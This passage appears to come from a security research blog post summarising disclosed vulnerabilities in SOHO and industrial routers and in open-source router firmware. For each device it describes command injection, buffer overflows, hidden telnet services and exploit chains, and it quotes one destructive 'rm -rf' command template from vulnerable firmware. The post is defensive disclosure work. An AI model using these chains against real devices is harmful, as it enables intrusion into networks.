these devices once the vulnerabilities are patched.\n\nIn this blog post, we provide a summary of the vulnerabilities we discovered in these devices, specifically focusing on vulnerabilities adversaries were most likely to exploit, or ones that could be chained together to gain an elevated level of access to the device or network. This is by no means the end of our research into SOHO or industrial routers. We plan to continue investigating these types of devices to better protect our customers and the community as a whole. \n\n# Routers\n\n## **ASUS RT-AX82-U**\n\nResearch conducted by Lilith Wyatt.\n\n### Background\n\nOur researchers chose to examine the ASUS RT-AX82-U because it is a very popular router and it shares a codebase with a plethora of other ASUS routers. Over the course of the research, Talos submitted three unique reports to ASUS, resulting in three CVEs. The ASUS RT-AX82-U contains a large amount of open-source code in the form of the asus-merlin-ng firmware. During this research, this section of code was avoided in favor of device- and feature-specific codebases within the device, including smart home integrations and the AiMesh functionality. The smart home integration features are designed for integration with Amazon Alexa or the "If This, Then That" (IFTTT) automation framework to provide more easily accessible functionality or automation. The AiMesh feature is a mesh networking solution designed to allow for multiple routers to work together to provide Wi-Fi connectivity over a larger area from a single network connection point. These features are enabled by default in the stock configuration of the device. This means that, without explicit effort by a user to disable these features, all ASUS RT-AX82-U devices could be targets.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1586**: This vulnerability existed in the smart home integration features of the router. If a user ever generates a token to use with IFTTT, an authentication token is generated to allow functionality to be leveraged on the router. This token can be easily brute-forced, as there are only 255 possible combinations, and the validity is measured based on when the token was generated and the device's uptime. This means if the router is rebooted, this vulnerability is exploitable up until the time (in seconds from reboot) the token was originally created, instead of the intended two-minute timeout. Leveraging this vulnerability allows an attacker to gain administrative privileges on the router as if they were properly authenticated. \n\n * **TALOS-2022-1590**: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication control messages, an improperly sized read can be used to leak information that can be decrypted locally based on known plaintext. This is possible because the provided length of a user-supplied AES key, which needs to be a set size based on the AES variant used (in this case AES-256), is not checked. By providing a key smaller than the required size, extra information can be returned to the user. \n\n * **TALOS-2022-1592**: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication diagnostic messages, an improperly sized packet can lead to a denial of service. This is possible due to the lack of length validation on packets ingested, which leads to an integer underflow. This integer underflow is then utilized in a read loop that ends in accessing unmapped memory, causing a crash.\n\n### Observations\n\nThe primary issue in the Asus RT-AX82-U came from the inclusion of services that do not necessarily need to be activated by default. The smart home integration service should be disabled by default, as it is by no means required for the operation of the router and likely is not utilized in most scenarios. The AiMesh service could be disabled by default and only enabled if a user wants to utilize a mesh network. While disabling this functionality would not have removed the vulnerabilities from the device, it would significantly reduce the attack surface as well as reduce the number of deployments that had devices in vulnerable states.\n\n## **D-Link DIR-3040**\n\nResearch conducted by Dave McDaniel.\n\n### Background\n\nThe D-Link DIR-3040 is another popular device and was an interesting subject for our researchers because of the mesh communications used between nodes to provide improved Wi-Fi coverage wherever the device is deployed. Over the course of the research, Talos submitted six unique reports to D-Link, resulting in six CVEs. The research targeting the D-Link DIR-3040 focused on all aspects of the device in a stock configuration of the device. This included the web services -- including hidden diagnostic services -- and Wi-Fi mesh networking implementation, as well as other general security issues. The Wi-Fi mesh networking implementation allows for multiple routers to connect together to provide increased network coverage.\n\n### Notable Vulnerabilities\n\n * **TALOS-2021-1284**: This vulnerability was a combination of web server functionality and an issue within hidden functionality. By visiting a hidden URL of the router, an attacker could activate a hidden telnet console used for diagnostics. Within this diagnostics menu, multiple commands within the restricted shell lacked proper input sanitization and, as such, allowed arbitrary command injection. \n\n * **TALOS-2021-1361**: Talos discovered this vulnerability within the Wi-Fi mesh networking service enabled by default on the device. By utilizing hard-coded credentials, an attacker could connect to the MQTT server. Once connected, an attacker could query information about the mesh. This information was encrypted but could be decrypted utilizing the MAC address of the base router, which was found in the same message. Once decrypted, the root password for the primary router could be recovered. \n\n * **TALOS-2021-1281**: Talos discovered this vulnerability within the Zebra network management service which was enabled by default on the router. By utilizing hard-coded credentials for this service, an attacker could access diagnostic tooling for the router. An adversary could change the service login banner to a file to leak sensitive information otherwise inaccessible via this service.\n\n### Observations\n\nThe DIR-3040 web server contains hidden paths to access debugging functionality on the device. There is no reason to hide this functionality, and it is better off as an explicit option that a user has to manually enable. Hard-coded credentials should also never be included in modern devices. Finally, as with the RT-AX82-U, the MQTT server related to mesh communication should not be enabled unless a feature that requires the MQTT server is enabled by a user during setup or other configuration.\n\n## **InHand Network InRouter 302**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nOur researchers examined the InHand Network InRouter 302 because three ATM providers claimed to have used this device: Wireless ATM STORE.COM, Wincor Nixdorf and UnionPay. Over the course of the research, [Talos submitted 23 unique reports to InHand](<https://blog.talosintelligence.com/vulnerability-spotlight-inhand-router-302-oct-2022/>), resulting in 25 CVEs. The research targeting the InHand Network InRouter 302 focused on all aspects of the device in a stock configuration of the device. This included the web server, API services and general security issues. The web server contained multiple vulnerabilities, including cross-site scripting and common gateway interface (CGI) issues. The console utilities of InRouter also contained numerous vulnerabilities. During the course of this research, an interesting unescape vulnerability was identified that spanned numerous open-source projects and closed-source products. This vulnerability will be discussed more in-depth in the Siretta router section.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1469**: This vulnerability existed in the HTTP server. It exploits the _`/info.jsp`_ endpoint, which is normally only used by web pages themselves. The endpoint will effectively _**`eval` **_the parameter sent as a Javascript command. Because the endpoint is not limited in access, this leads to a cross-site scripting (XSS) vulnerability.\n * ******TALOS-2022-1472**: ****This vulnerability existed in the HTTP server. Because of improper access control, a low-privileged user could update the router configuration, enabling them to change to privileged user credentials, resulting in privilege escalation.\n * **TALOS-2022-1476**: The vulnerability existed within the restricted console presented to a user when using SSH or Telnet. This console contained multiple commands, including `_factory_`, a command that only the most-privileged user could execute. By utilizing this command, an attacker could use this (presumed) debug functionality to overflow the stack buffer used to hold the user data while it was being parsed. This vulnerability could lead to arbitrary code execution.\n\n### Observations\n\nThese three vulnerabilities would allow an attacker to obtain root access to the device starting with a single click. TALOS-2022-1469 is an XSS vulnerability that could allow an attacker to exfiltrate the session cookie of a logged-in user. If the session cookie belonged to a low-privileged user, an attacker could chain TALOS-2022-1472 to update the router's configuration, enabling them to change privileged user credentials, resulting in privilege escalation. An attacker, at this point, would have the most elevated permitted credentials, but no root access. However, by exploiting TALOS-2022-1476, an attacker would be able to obtain, through a stack-based buffer overflow, remote command execution. \n\nWe wrote [an extensive blog post](<https://blog.talosintelligence.com/vuln-spotlight-in-hand-networks/>) that discusses, in-depth, how an attacker could chain the vulnerabilities discovered to obtain remote command execution in the InHand Network InRouter 302 with a one-click attack.\n\n## **Linksys E Series**\n\nResearch conducted by a researcher within Cisco Talos.\n\n### Background\n\nThe Linksys E Series devices were directly affected by the VPNFilter campaign. The E1200 and E2500 are two SOHO routers offered by various vendors over the years, most recently Linksys. The devices target low-budget installations, providing four Ethernet ports for additional device connections. The E Series provides a web-based management console to allow owners to make administrative changes to the system configuration. This web console also provided the main attack surface during our analysis of the device.\n\n### Notable Vulnerability\n\n * **TALOS-2018-0625**: This disclosure contains three related authenticated command injection vulnerabilities, all accessible via the web-based management portal. Many of the configuration details passed to E Series routers during configuration must be retained across a device's power cycle. Since the device has only one writable directory (/tmp) and that directory is cleared on reboot, the device uses NVRAM to store configuration details. Three paths exist where one of two parameters, `machine_name` or `wan_domain`, are retrieved from NVRAM and subsequently used directly in a command passed to `system()`. \n\n## **Milesight UR32L and MilesightVPN**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nThe Milesight UR32L is an industrial router that offers a good tradeoff between price and functionalities. The vendor also provides software for a remote access solution called MilesightVPN which, theoretically, allows the UR32L to be less exposed, thus making it more difficult for an attacker to target it. Over the course of the UR32L research, Talos submitted 17 unique reports to Milesight, [resulting in 63 CVEs](<https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/>). Talos researchers also sent Milesight five unique reports for the VPN solution, resulting in six CVEs. This research focused mainly on two components: its HTTP server with its related components and the router console shell. Our analysis also considered the attack scenario in which the user is using Milesight's MilesightVPN, so as to investigate a more complete attack scenario.\n\n### Notable Vulnerabilities\n\n * **TALOS-2023-1701**: This vulnerability existed in the HTTP server login functionality of the MilesightVPN. This is an SQL injection vulnerability that would allow an attacker to bypass the web login and grant access to the administrative web pages. This in turn allows an attacker to communicate with routers connected to the VPN.\n * **TALOS-2023-1697**: This vulnerability existed in the HTTP server login functionality of the UR32L. This is the most severe vulnerability found on the router. Indeed, it is a pre-authentication remote stack-based buffer overflow. An unauthenticated attacker able to communicate with the HTTP server would be able to perform remote command execution. One way to communicate with the HTTP server remotely is by using TALOS-2023-1701.\n * **TALOS-2023-1706**: The UR32L offers different diagnostic functionalities within its HTTP server, like ping and trace. Both of these vulnerabilities have an OS command injection vulnerability through the specified host. An attacker with low-privilege credentials in the UR32L could exploit these vulnerabilities and execute remote commands.\n\n### Observations\n\nThe vendor provides MilesightVPN software, a remote access solution. The underlying idea is that by using this software, Milesight's UR32L would not need to be exposed to the internet, thus reducing the attack surface and making it more difficult for an attacker to target it. During our research, we took into consideration this scenario and demonstrated that unfortunately, [an attacker can use TALOS-2023-1701](<https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/>) to attack the remote access solution software and then execute arbitrary code inside the UR32L by using TALOS-2023-1697.\n\n## **Netgear Orbi Router RBR750/RBS750**\n\nResearch conducted by Dave McDaniel.\n\n### Background\n\nThe Netgear Orbi RBR750/RBS750 was chosen due to its popularity and reputation of quality. This device is widely adopted as a high-end SOHO router choice and also utilizes a mesh network to connect satellites. Over the course of the research, Talos submitted four unique reports to Netgear, resulting in four CVEs. This research of the Netgear Orbi Router RBR750 focused on multiple services across the devices, such as the management web server and services provided by the device on the local network. The network services included hidden functionality that could be activated using a special network packet. The Orbi utilizes the open-source OpenWrt ubus code base for communication between the satellites and primary router, but also includes hidden additional functionality on top of this library.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1595**: This vulnerability is based on the existence of an undocumented service listening on UDP port 23. This service listened for an encrypted packet containing the MAC address, username and password of the _br-lan_ interface of the device. The encryption used was a modified blowfish algorithm similar to those used for the Nintendo DS handheld video game system's cartridge copyright protection. Once the packet was retrieved, a telnet daemon was spawned which allowed direct access to the underlying busybox system.\n * **TALOS-2022-1596**: This vulnerability existed in the web-based administration of the Orbi. Within the web interface, there was functionality to block specific devices specified by MAC address and device name. The device name field of the associated POST request is vulnerable to command injection due to a lack of user-input sanitization. An attacker could craft a malicious packet to execute arbitrary commands on the device with root privileges.\n * **TALOS-2022-1592**: This vulnerability existed in the Wi-Fi mesh communication service of the device. This service utilized the open-source library, developed by OpenWrt, ubus. More specifically, this vulnerability was due to functionality Netgear built on top of the ubus library. If an attacker had knowledge of the web interface password or the default password, it would be possible to send a ubus message to activate a hidden telnet service. This hidden telnet functionality could then be used by an attacker to obtain direct access to the underlying busybox system.\n\n### Observations\n\nThe Netgear Orbi mainly suffered from a lack of user input sanitization and the presence of hidden services. User input should be sanitized server-side using well-tested libraries instead of one-off solutions, or worse, client-side solutions. Providing a telnet service is not inherently bad, but hiding the activation from a user does not seem to provide value. Including hidden ways of activating the telnet server makes it more difficult for a user to know how to minimize their risk.\n\n## **Robustel R1510**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nThe Robustel R1510 was chosen due to the physical danger vulnerabilities could present. This router is used in physical systems such as elevators, and Robustel partners with many wide-reaching industrial control system vendors such as Vodafone, Bosch, Siemens, Emerson and Schneider Electric. Over the course of the research, Talos submitted 10 unique reports to Robustel, resulting in 26 CVEs. Research on the Robustel R1510 was primarily focused on the web server, which manages almost all functionality of the device.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1577**: This vulnerability was contained within the web server and the functionality directly associated with installing a NodeJS application. While uploading a new NodeJS application, a global variable is set with the provided filename as part of the POST request. Once the file is uploaded to the web server, a second request is required to install the application. Using this request, it was possible for an attacker to trigger a command injection by crafting a maliciously named file. Once the application was installed, the command injection would be triggered. This allowed an attacker to execute arbitrary commands on the device. \n\n * **TALOS-2022-1576**: Talos discovered this vulnerability within the firmware upgrade functionality found within the web server. The R1510 utilized a modified U-Boot header but maintained the presence of the character array used for the firmware name. This field was not validated or escaped before being used directly in the function call _system_. An attacker could use this to craft a firmware update file that would result in arbitrary command injection during the update process. \n\n * **TALOS-2022-1578**: Talos discovered this vulnerability within the SSH-authorized key uploading feature within the web management interface of the R1510. An authenticated user could change their Linux username on the device. This created a directory path for the SSH keys used in certificate-based authentication. When a user uploaded a new SSH key, their username was used directly, without any validation, to build a directory path that was passed into a `_sysprintf_` function call, which would result in a command injection. An attacker could leverage a vulnerability to bypass authentication in the web interface, then continue to leverage this vulnerability to execute arbitrary commands within Linux.\n\n### Observations\n\nMost of the discovered vulnerabilities in the Robustel R1510 were related to a lack of user input sanitization. Ideally, a common code base would be used for many instances of checks across the device. If there was no specific performance requirement, these checks would occur multiple times throughout the process of uploading files and utilizing previously uploaded files. Using a common library to perform these checks would negate the risk of validation falling out of sync with checks elsewhere in the system.\n\n## **Sierra Wireless Airlink**\n\nResearch conducted by Carl Hurd.\n\n### Background\n\nTalos researchers chose to investigate the Sierra Wireless Airlink because of its deployment flexibility. The AirLink is intended for use in remote locations utilizing a cellular connection for local devices. The AirLink is managed out-of-band from the network provided by the device. Talos submitted 11 unique reports to Sierra Wireless, resulting in 13 CVEs. The research was focused on all aspects of the device, including the web server, custom console binary, SNMP and other exposed services on the device. If an attacker were to compromise this device, it would be possible to leverage the functionality of the device to manipulate traffic on all sides of the network.\n\n### Notable Vulnerabilities\n\n * **TALOS-2018-0751**: This vulnerability is contained within the web server ACEManager, which lacked a cross-site request forgery prevention header. These headers allow the server to check that requests are coming from a similar session in a coherent manner, instead of coming from a link of an unrelated browser capitalizing on a pre-authenticated session. This vulnerability allows for the possibility of session hijacking using various methods. \n\n * **TALOS-2018-0750**: This vulnerability existed in the ping_result.cgi binary, which did not properly filter input before reflecting it back to the client. This improper filtering allowed JavaScript to be injected into the response to the client. This could be used to run code on the client's browser, such as making requests on behalf of the user or disclosing confidential tokens. Using this vulnerability in addition to TALOS-2018-0751 allowed for complete session hijacking of an authenticated user. \n\n * **TALOS-2018-0748**: Talos discovered this vulnerability within the file upload capability of templates within the AirLink 450. When uploading template files, a user can specify the name of the file being uploaded. There were no restrictions to protect the files currently on the device and used for normal operation. If a file was uploaded with the same name as a file that already existed in the directory, it inherits the permissions of that file. In this case, multiple CGI files could be overwritten with execute permissions. After replacing the file, an adversary could navigate to the newly uploaded CGI binary, and the code would be executed. By leveraging TALOS-2018-0751 and TALOS-2018-0750, the adversary could hijack an authenticated session of a user after uploading malicious code and executing it on command. This would result in fully unauthenticated remote code execution.\n\n### Observations\n\nMost of the findings on the Airlink 450 centered around the web server and the basic functionality it provides. The lack of CSRF tokens provided by the web server and the reflected XSS vulnerability allows authenticated requests to be made by hijacking a user's session. A well-developed and tested web server should include CSRF automatically. The XSS can be mitigated by utilizing JavaScript libraries, or sanitization libraries if using CGI binaries, to sanitize user input properly. Finally, file upload functionality should be strictly limited to a folder that only contains user-uploaded files, to avoid permissions issues or file overwrites that could be used maliciously.\n\n## **Siretta QUARTZ-GOLD**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nThe Siretta QUARTZ-GOLD was included in this research because the device is often deployed near critical devices, giving vulnerabilities an increased level of urgency. The device has a 4G/LTE failover mechanism for network uptime, which likely means the router is deployed on critical networks. Over the course of the research, Talos submitted[ 14 unique reports to Siretta, resulting in 62 CVEs](<https://blog.talosintelligence.com/vulnerability-spotlight-os-command-injection-directory-traversal-and-other-vulnerabilities-found-in-siretta-quartz-gold-and-freshtomato/>). The research of the Siretta QUARTZ-GOLD explored all aspects of the router that were accessible by default. This included the HTTP server, SNMP server implementation, and various command line interface (CLI) tools. The majority of the router firmware is a fork of FreshTomato, which is an open-source router firmware. By utilizing this firmware, the QUARTZ-GOLD inherits a code reuse vulnerability from the project, just as many other projects that utilize the open-source codebase.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1638:** This vulnerability existed in the M2M feature of the QUARTZ-GOLD. When the M2M feature was enabled, the m2m binary was executed. This binary offered rich functionality through a custom UDP protocol, including a function called "DELETE_FILE", which would allow execution of the `_rm -rf <base_folder>/<M2M_data_entry.data> &_` command through the `system`_ _function. The _`M2M_data_entry.data`_ portion of the command was specified in the UDP packet without any parsing or sanitization on the _`M2M_data_entry.data`_ string. This functionality was vulnerable to command injection. Furthermore, the `DELETE_FILE` functionality did not require authentication. An unauthenticated attacker could use this vulnerability to achieve arbitrary command execution.\n * **TALOS-2022-1615**: This vulnerability existed in the SNMP functionality of the router. The QUARTZ-GOLD implemented a feature that allowed for custom OIDs to be defined within the router. An attacker could submit a custom OID that would be executed whenever that OID was queried. The simplest solution was to execute commands directly as the root user in the Linux shell. An adversary could leverage this vulnerability to achieve arbitrary command injection.\n * **TALOS-2022-1610**: Talos discovered this vulnerability within the web server functionality of the QUARTZ-GOLD. By basing the firmware of this device off of the FreshTomato firmware, many default features were inherited from the FreshTomato firmware that was not documented as part of the device functionality. More specifically, debug functionality was not disabled in FreshTomato and allowed a user authenticated to the web interface to issue direct Linux commands as if they had a shell. An authenticated attacker could use this vulnerability to achieve arbitrary command injection.\n\n### Observations\n\nThe Siretta QUARTZ-GOLD inherited many of the discovered vulnerabilities from the third-party code base included in the product. FreshTomato includes many features that are prebuilt but could have been disabled if the manufacturer were more familiar with the code they were building from. Much of the debugging functionality provided by FreshTomato is undocumented in the Siretta device and seems unintentionally included. When reusing large code bases, it is important to know what exactly is being included in that code base, and how it can be properly configured for the use-case the developer has in mind.\n\n## **Synology SRM - RT2600ac**\n\nResearch conducted by Claudio Bozzato.\n\n### Background\n\nThe Synology RT2600ac is a high-end SOHO router that runs on Synology SRM (Synology Router Manager), a Linux-based operating system for all Synology routers. Talos researchers chose to look at this product because of its popularity and reputation for quality. We submitted nine reports to Synology, of which two affect their VPN service (QuickConnect), and one affects a Qualcomm tool used in SRM, eventually leading to the disclosure of 10 CVEs. QuickConnect is Synology's VPN service, which allows for managing routers remotely without requiring the configuration of the router to expose its management port and without having to manage DDNS services to locate the router remotely.\n\nThis research has been detailed in a dedicated [blog post](<https://blog.talosintelligence.com/vulnerability-spotlight-multiple-63063210e63ef5e7e1ec312c/>), which explains how Talos managed to chain some of the reported vulnerabilities to achieve remote code execution without prior authentication in SRM devices via Synology's VPN services, which are publicly accessible.\n\n### Notable Vulnerabilities\n\n * **TALOS-2020-1064**: When routers connect to the QuickConnect VPN, they are placed in a dedicated subnet. This report demonstrates that the subnets are, however, not logically split, so it is possible to change the assigned netmask to a larger one, allowing one to talk with any other router connected to the same VPN. The VPNs are accessible by routers upon registration against QuickConnect. But after initial registration, the router is not needed anymore, and the attack can be performed independently of the device. There are several VPNs available that are easily enumerable and seem to be geo-located. \n\n * **TALOS-2020-1066**: This report describes a vulnerability in iptables' rules within the router. SRM defines filtering rules to prevent access only on selected ports from LAN. However, those rules are missing for connections that come from the QuickConnect VPN. This means that any service listening on the device is remotely accessible from the VPN. This can be used together with TALOS-2020-1064 to have unrestricted communication with any network service running in a chosen device from those reachable in the VPN. \n\n * **TALOS-2020-1065** \\- This report describes a vulnerability in Qualcomm's `_lbd_`_,_ a service reachable via LAN on ports 7786 and 7787, which can be used without authentication to directly execute shell commands as root, whenever an attacker is on the same LAN as the router. Since this is reachable via LAN, it is also reachable via the VPN. By chaining this vulnerability with the two above, it was possible to execute arbitrary commands as root via the VPN, without prior authentication, on any selected router connected to QuickConnect.\n\n### Observations\n\nSynology SRM provides a convenient VPN service to solve the remote management issue for SOHO routers running on a dynamic IP address. However, this research has shown that such services can also widen the attack surface. Devices exposed via DDNS normally take more effort to be discovered, usually requiring an internet-wide scan. With QuickConnect, however, all devices are easily discovered as they're all connected to the same VPN, which is publicly accessible and whose geo-located services are easily enumerable.\n\n## **TCL Linkhub Mesh Wifi**\n\nResearch conducted by Carl Hurd.\n\n### Background\n\nThe TCL Linkhub is one of the newest products sold by TCL and the feature set and price tag could mean a very rapid adoption rate, much like the budget TV market. Over the course of the research, Talos submitted 17 unique reports to TCL, resulting in 42 CVEs. The research on the TCL Linkhub Mesh Wi-Fi system was primarily focused on the API service that is used for all management of the device. The Linkhub does not use a web server to serve a user interface, instead, all interaction with the device is done through a phone application. This phone application interacts with the device through a ProtoBuffer-based API. This service is one of the few ports open by default and thus was the most interesting target for this research.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1463**: This vulnerability existed in the code for getting and setting values in a flash of the LinkHub. This vulnerability is interesting because it was not contained in a specific library and was used in almost every binary on the device. While getting values from a flash, the function did not take into account the length of the destination buffer. An attacker could easily change a configuration value to a large value, and the next time that variable was loaded from flash, it would cause a buffer overflow. This vulnerability would lead to arbitrary code execution.\n * **TALOS-2022-1455**: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it is dispatched to various handlers across the device. Within the `_set_mf_rule_` functionality, a `memcpy` occurs that determines length based on user input directly. Attackers could use this functionality to send a `mf_rule` message that contains fields larger than the statically sized buffers in the device. This vulnerability would lead to a buffer overflow and arbitrary code execution.\n * **TALOS-2022-1458**: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it's dispatched to various handlers across the device. Within the `ucloud_add_node` functionality, which is used to add satellites to the router mesh, a `MxpManageList` message is parsed directly into the `system` function. An attacker could use a malicious message to execute arbitrary commands using this vulnerability.\n\n### Observations\n\nThe TCL LinkHub has a unique approach to management, which changes the attack surface significantly. Choosing to utilize Protobuffers for serialization is a good decision on the developer's part, as it is a well-tested and maintained library, but once the data is unserialized, much of the input is blindly trusted since it is assumed to come from the management application. All of this data should be treated as user data and more validation should occur once deserialization occurs, prior to use in potentially dangerous functions, such as `memcpy`.\n\n## **TP-Link TL-R600VPN**\n\nResearch conducted by Jared Rittle and Carl Hurd.\n\n### Background\n\nThe TP-Link TL-R600VPN became a subject of our research for its direct involvement in the VPNFilter campaign. The TP-Link TL-R600VPN is a five-port SOHO router. This device contains a Realtek RTL8198 integrated system on a chip. This particular chip uses an offshoot of the MIPS-1 architecture developed by Lexra. This device is a fairly run-of-the-mill small router and contains network diagnostic capabilities and basic router functionality that is managed by a web server on the device. This research led to four Talos reports to TP-Link, resulting in four CVEs. For a more in-depth look at the research done on this device, refer to the corresponding [blog post](<https://blog.talosintelligence.com/vulnerability-deep-dive-tp-link/>).\n\n### Notable Vulnerabilities\n\n * **TALOS-2018-0620**: This vulnerability existed in the header parsing of HTTP requests within the web server. This vulnerability was triggered by sending a request to a specific subset of pages on the web server. Once the request was made, a statically sized buffer is used for the parsed headers. An attacker could use an abnormally long header entry to overflow the buffer and overwrite the return address. This vulnerability leads to arbitrary code execution.\n * **TALOS-2018-0619**: This vulnerability existed in the network debugging functionality of the device. The ping functionality of the R600-VPN contained a parameter that was unchecked by user input. An attacker could supply an abnormally long ping_addr parameter to overflow the statically sized buffer used to hold the value, in turn overwriting the return address. This vulnerability leads to arbitrary code execution.\n * **TALOS-2018-0618** \\- This vulnerability was contained within the HTTP server within the R600-VPN. The user-provided URL was parsed without regard for special characters such as "../" to navigate up a directory tree. Normally, special characters like this are removed or ignored in a URL and the directory navigation does not occur, but in the R600-VPN this navigation could be used to retrieve any files on the device. This vulnerability leads to sensitive information disclosure.\n\n### Observations\n\nMost of the findings on the TL-R600VPN centered around the web server and the functionality provided by it. One of the simplest solutions to reduce risk is to integrate a well-tested web server instead of developing one from scratch or including untested code in the product. While some of the vulnerable code was within the web server itself, much of it was also added by the manufacturer for simple additional features, like network diagnostics. It is clear from this research that any added code needs to be reviewed to prevent these issues.\n\n## **ZTE MF971R**\n\nResearch conducted by Marcin Noga.\n\n### Background\n\nThe ZTE MF971R mobile router is one of the newest devices in the ZTE MF mobile routers family. At least in Poland, it is a very popular device and its popularity is due to the fact that it's being sold among others by major GSM providers or even added as a gift to some of their products/services. Over the course of the research, Talos submitted seven reports to ZTE, resulting in seven CVEs. The research on the ZTE MF971R router was primarily focused on the web application/server that is used for all management of the device. We have managed to find a set of vulnerabilities in Web APIs which chained together allowed us to create a one-click exploit, giving us full remote access to the device. See our [deep dive whitepaper](<https://talosintelligence.com/resources/407>) for a more in-depth explanation.\n\n### Notable Vulnerabilities\n\n * ******TALOS-2021-1317:** ****This vulnerability is related to the implementation of CSRF protection/API restriction communication in Web APIs. To communicate with a certain set of Web APIs, a request should be sent from a 127.0.0.1 address or default router IP address -- 192.168.0.1. It's verified by checking the HTTP Referer value. Unfortunately, the way the check was implemented gives an attacker the possibility to bypass it by simply adding string 127.0.0.1 in any part of a referrer URL and obtaining full access to API communication.\n * ******TALOS-2021-1320:** ****Talos discovered this vulnerability within the implementation of the ADB_MODE_SWITCH Web API. A password parameter being a part of this API is not properly sanitized in the context of its length which leads to a stack-based buffer overflow. The victim does not need to be logged in to be affected by this vulnerability. The only constraint an attacker needs to pass is a referrer check, which is easy to bypass and has been described in TALOS-2021-1317. This remote pre-auth stack-based buffer overflow gives an attacker full control when overwriting the return address and as we demonstrated can be turned into one-click remote code execution.\n\n### Observations\n\nThe ZTE MF971R's security suffered for several reasons. Despite visible efforts to reduce access to certain WebAPIs, it was still possible to bypass this mechanism, thus increasing the number of attack vectors. The main web server binary lacked compatibility with basic mitigations such as ASLR (Address Space Layout Randomization) and stack cookies, making the exploitation of existing vulnerabilities trivial. Improving security mechanisms in the aforementioned areas will reduce the number of attack vectors and make exploiting existing vulnerabilities, especially those without any authorization, more difficult or practically impossible.\n\n# Common frameworks\n\nThe previous section talked about the specific routers that we investigated. However, some of these routers also ran specific software that is common for many routers: open-source firmware such as OpenWrt, FreshTomato, AsusWRT or DD-WRT. One router also ran a specific kernel module called KCodes. As this software isn't specific to the vendors we discussed in the router sections, we're grouping the vulnerabilities we found together.\n\n## **OpenWrt**\n\nResearch conducted by Claudio Bozzato.\n\n### Background\n\nOpenWrt is a Linux-based OS, primarily used on embedded devices to route network traffic. It's highly customizable and ships with a set of tools and libraries that have been optimized to run on hardware with limited resources. Due to this, OpenWrt is a common choice among SOHO routers.\n\n### Notable Vulnerabilities\n\n * **TALOS-2019-0893**: This vulnerability affected the ustream-ssl library, a library that works as an SSL wrapper for OpenSSL, mbed TLS and wolfSSL. This issue describes how the library does not terminate the SSL connection immediately when a wrong certificate is supplied by an HTTPS server, allowing the client to send one request using any unverified certificate, before terminating the connection. As OpenWrt uses this library for tools like `wget`, any functionality relying on it would be affected by this information leak when requesting any HTTPS URL, which could allow, in the worst case, for an attacker to perform a man-in-the-middle attack and steal any sensitive information present in the request.\n\n### Observations\n\nBecause the HTTPS connection eventually terminates with an error, this issue can easily go unnoticed. As OpenWrt is a platform that is easy to customize and write scripts for, such a vulnerability may affect a large number of users.\n\n## **FreshTomato**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nThe FreshTomato is a popular open-source firmware project. It is an actively maintained and modern firmware project that's widely used by multiple SOHO routers. By default, it ships with several functionalities, e.g., SSH, VPN capabilities, Telnet, Routing, etc.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1642**: This vulnerability existed in one of the functionalities provided by FreshTomato's HTTP server. It provides a simple template language, one of the templating functions to read the content of a file, provided by the user in a specific folder. Because no sanitization is performed and the file path is composed by concatenating the hard-coded path with the provided filename, this function is vulnerable to path traversal. An attacker with valid credentials could read any file in the file system.\n * **TALOS-2022-1641**: This vulnerability existed in one of the log-related functions provided by FreshTomato's HTTP server. The functionality allows users to find certain strings in the log file via OS commands. Because no real sanitization is performed against the user-controlled parameter, this function is vulnerable to an OS command injection vulnerability. An attacker could leverage this vulnerability to achieve arbitrary command injection.\n * **TALOS-2022-1509**: This vulnerability existed in the URL unescape functionality provided by FreshTomato's HTTP server. The unescape always assumes that there are two characters following the '%' character. However, this is not the case and opens the door to an out-of-bounds read-and-write.\n\n### Observations\n\nBecause the FreshTomato project is the base for many routers, any vulnerability found in the software could have wide-ranging consequences. We cannot fully gauge how the firmware is deployed and how much impact these vulnerabilities will have on the deployed router.\n\n## **Asuswrt and Asuswrt-Merlin New Gen, DD-WRT**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nLike FreshTomato, Asuswrt and Asuswrt-Merlin, New Gen and DD-WRT are the base firmware for several SOHO routers.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1511**: This vulnerability existed in the URL unescape functionality provided by the Asuswrt and Asuswrt-Merlin New Gen vulnerability's HTTP server. The unescape always assumes that there are two characters following the "%" character. However, this is not the case and could lead to an out-of-bounds read and write.\n * **TALOS-2022-1510**: This vulnerability is in the URL unescape functionality provided by the DD-WRT's HTTP server. The unescape always assumes that there are two characters following the "%" character, however, this assumption is incorrect and could lead to an out-of-bounds read and write.\n\n### Observations\n\nAfter our researchers discovered TALOS-2022-1509, we discovered [other software that was vulnerable to the same unescape vulnerable pattern](<https://blog.talosintelligence.com/vulnerability-spotlight-how-code-re-use/>), including TALOS-2022-1511 in Asuswrt and Asuswrt-Merlin New Gen, and TALOS-2022-1510 in DD-WRT.\n\n## **KCodes NetUSB.ko**\n\nResearch conducted by Dave McDaniel.\n\n### Background\n\nSome NETGEAR routers utilize a bespoke kernel module called NetUSB.ko from a Taiwanese company called KCodes. This module is custom-made for each device but contains similar functionality. The module shares USB devices over TCP, allowing clients to use various vendor-made drivers and software to connect to these devices in such a way that the client machine treats the remote device as a local USB device plugged into their computer. The software used for NETGEAR routers is called NETGEAR USB Control Center, and it utilizes a driver called NetUSBUDSTcpBus.sys (on Windows) for communications.\n\n### Notable Vulnerabilities\n\n * **TALOS-2019-0775**: Once the static AES key was recovered, an attacker could easily trigger a DoS or remote information disclosure using a single opcode after the handshake. \n * 